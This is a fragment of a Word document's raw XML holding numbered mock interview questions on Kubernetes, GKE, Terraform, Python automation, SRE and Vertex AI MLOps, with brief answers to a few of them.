        <w:t>Q1133. A pod is running but the application is not reachable through the Service. How would you debug it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1134. How do readiness and liveness probes differ in Kubernetes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1135. Scenario: After a deployment, 30 percent of requests fail. How would you respond?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1136. What is the difference between a Deployment, StatefulSet, and DaemonSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Deployment manages stateless replicated applications and supports rolling updates. A StatefulSet provides stable network identity and stable persistent storage for stateful workloads such as databases. A DaemonSet ensures one pod runs on each selected node, commonly for logging agents, monitoring agents, CNI components, or security tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1137. How do you design resource requests and limits for production workloads?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1138. Scenario: Kubernetes nodes are under memory pressure. What would you check?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1139. Explain Horizontal Pod Autoscaler and when it may not work well.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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1140. Scenario: Pods are Pending even though the cluster has free CPU. What could be wrong?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1141. What are taints and tolerations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Taints repel pods from nodes unless the pods have matching tolerations. They are useful for dedicated nodes, GPU nodes, system workloads, or isolating special environments. Tolerations allow scheduling but do not force it; node affinity or node selectors are needed to attract pods to specific nodes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1142. How do you secure Kubernetes secrets?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1143. What is Workload Identity in GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workload Identity lets Kubernetes service accounts securely impersonate Google service accounts without long-lived JSON keys. It improves security by removing static credentials from pods. Access is controlled through IAM bindings between Kubernetes service accounts and Google service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1144. Scenario: A GKE workload gets permission denied when accessing Cloud Storage. How do you debug it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1145. How do you design a private GKE cluster?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1146. Scenario: GKE cost suddenly increased. What would you investigate?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1147. How do you make Terraform state secure?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1148. What is Terraform drift and how do you handle it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1149. Scenario: `terraform apply` wants to recreate a production database. What do you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1150. Explain `for_each` vs `count` in Terraform.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1151. How do you structure Terraform modules for a platform team?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1152. Scenario: A Terraform plan passes locally but fails in CI. What could be the issue?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1153. How do you manage multiple environments in Terraform?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1154. How do you use Python in DevOps or MLOps automation?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1155. Scenario: A Python automation script works manually but fails in a cron job. How do you debug it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1156. How do you handle retries in Python automation?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1157. What is idempotency and why does it matter in automation?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1158. Scenario: Your Python script calling GCP APIs hits quota errors. What would you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1159. How do you write production-quality Python scripts?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1160. What is the difference between a Python list, tuple, set, and dictionary?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1161. Explain Python virtual environments.</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1162. Scenario: A Kubernetes deployment keeps failing only during peak traffic. What would you investigate?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1163. How do you design a zero-downtime Kubernetes deployment?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1164. Scenario: A database migration breaks the new application version. How should deployment be designed?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1165. What are Kubernetes PodDisruptionBudgets?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1166. Scenario: Node upgrades are stuck in GKE. What could be causing it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1167. What is a Kubernetes NetworkPolicy?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1168. Scenario: A service cannot connect to another namespace after enabling NetworkPolicy. What do you check?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1169. How does Kubernetes DNS work?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1170. What are common GCP networking components?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1171. Scenario: GKE pods cannot reach the internet from private nodes. What do you check?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1172. What is VPC Service Controls?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1173. Scenario: A data pipeline fails after enabling VPC Service Controls. How would you debug?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1174. How do you use Cloud Logging and Cloud Monitoring effectively?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1175. Scenario: Your alert fires but users are not affected. What should you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1176. What is an SLO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1177. Scenario: Error budget is almost exhausted. What actions would you recommend?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1178. How do you secure a CI/CD pipeline?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1179. Scenario: A secret was accidentally committed to Git. What should you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1180. How do you implement GitOps for Kubernetes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1181. Scenario: Argo CD shows OutOfSync but applying manually works. What could be wrong?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1182. What is the role of admission controllers in Kubernetes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1183. Scenario: A new policy blocks deployments in production. How do you handle it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1184. How do you design IAM in GCP for least privilege?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1185. Scenario: A service account has Owner role in production. What is your remediation plan?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1186. What are Terraform provider version constraints?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1187. Scenario: A Terraform provider upgrade changes many resources. What should you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1188. How do you test Terraform code?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1189. Scenario: Terraform state lock is stuck. How do you resolve it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1190. How do you build a Python tool to clean old GCP resources safely?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1191. Scenario: A cleanup script deleted a needed resource. How do you prevent recurrence?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1192. How do you parse large log files efficiently in Python?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1193. Scenario: A Python service has high memory usage in Kubernetes. What would you check?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1194. What is async programming in Python useful for?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1195. Scenario: An API automation tool is slow because it calls 500 endpoints sequentially. How would you improve it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1196. How do you approach incident response for cloud-native systems?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1197. Scenario: Latency increases after moving to a new GCP region. What do you check?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1198. How do you design disaster recovery for GCP workloads?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1199. Scenario: A regional outage affects your GKE application. What should your architecture support?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1200. How do you optimize Kubernetes cost without hurting reliability?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1201. Scenario: Batch jobs are starving production services in the same cluster. What would you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1202. What are priority classes in Kubernetes?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1203. Scenario: A model-serving API on Kubernetes has cold-start latency. How would you reduce it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1204. How do you monitor ML models in production?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1205. Scenario: A model's accuracy drops but infrastructure metrics look healthy. What do you investigate?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1206. How do you design a feature store on GCP?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1207. Scenario: Training and serving use different feature logic. What problem does this cause?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1208. How would you explain a complex production issue in an interview?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1209. Scenario: You are asked to design a secure self-service platform for developers. What would you include?</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>GCP Machine Learning and Vertex AI Mock Interview Questions (1081-1120)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1210. How would you design an end-to-end ML pipeline on GCP?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1211. Scenario: A data science team wants to move notebook experiments into production on Vertex AI. What would you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1212. What is Vertex AI Pipelines?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1213. How do you decide between Vertex AI, GKE, and Cloud Run for model serving?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1214. Scenario: A Vertex AI endpoint has high latency during peak traffic. How would you troubleshoot it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1215. What is model monitoring in Vertex AI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model monitoring tracks production model behavior such as feature drift, prediction drift, skew, and data quality changes. It helps detect when model performance may degrade after deployment. It should be combined with service metrics like latency, error rate, throughput, and resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1216. Scenario: Vertex AI Model Monitoring detects feature drift. What actions would you take?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1217. What is training-serving skew?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Training-serving skew happens when features used during training are calculated differently from features used during online prediction. This can cause production model performance to drop even if offline evaluation was strong. Prevent it with shared feature logic, feature stores, data validation, and tests comparing offline and online feature values.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1218. How would you use BigQuery for ML workflows?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1219. What is BigQuery ML?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1220. Scenario: A BigQuery ML training query becomes expensive. How would you optimize it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1221. How do you secure ML workloads on GCP?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1222. Scenario: A Vertex AI training job cannot access data in Cloud Storage. How do you debug it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1223. What is a feature store and why is it useful?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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1224. How would you design feature freshness monitoring?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1225. Scenario: Online predictions use stale features. How would you respond?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1226. What are custom training jobs in Vertex AI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1227. How do you package Python ML training code for Vertex AI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1228. Scenario: A Vertex AI training job fails only after running for two hours. What would you check?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1229. How do you manage model versions in GCP?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1230. Scenario: A newly deployed model performs worse than the previous version. What would you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1231. How would you implement canary deployment for ML models?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1232. What is batch prediction in Vertex AI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1233. Scenario: A batch prediction job misses its SLA. How would you troubleshoot?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1234. How do you control cost for ML workloads on GCP?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1235. Scenario: GPU training cost is too high. What would you investigate?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1236. What is AutoML in Vertex AI?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1237. How would you compare AutoML and custom training?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1238. Scenario: A model endpoint must handle sensitive customer data. What architecture would you recommend?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1239. What is Responsible AI in GCP ML systems?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1240. How would you include explainability in a Vertex AI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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1241. Scenario: A compliance team asks for ML model lineage. What evidence would you provide?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1242. How do you use Pub/Sub in ML systems?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1243. Scenario: An async inference pipeline using Pub/Sub is producing duplicate predictions. How would you fix it?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1244. How would you monitor an ML pipeline on GCP?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1245. Scenario: A model training pipeline succeeds but the deployed model gives bad predictions. What could be wrong?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1246. How would you design CI/CD for ML models on GCP?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1247. Scenario: You need to deploy an ML model globally with low latency. What tradeoffs do you consider?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1248. Design a production-grade GCP ML platform for multiple teams.</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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>JD-Specific Senior Cloud Engineering Mock Interview Questions (1121-1180)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1249. How would you explain the role of a Senior Cloud Engineer in improving production reliability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Senior Cloud Engineer improves production reliability by combining cloud architecture, automation, observability, incident response, and SRE practices. The role is not only to deploy infrastructure but also to reduce incident frequency, improve availability, define SLOs and SLIs, automate runbooks, and make delivery safer through CI/CD, IaC, and DevSecOps controls. A strong answer should connect engineering decisions to customer impact, service quality, and operational efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1250. Scenario: Incident volume is increasing across a cloud platform. How would you reduce both volume and severity?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1251. How do you define SLIs and SLOs for a business-critical application?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1252. Scenario: A service has many alerts but users are not affected. What would you do?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1253. How do DORA metrics help improve DevOps maturity?</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
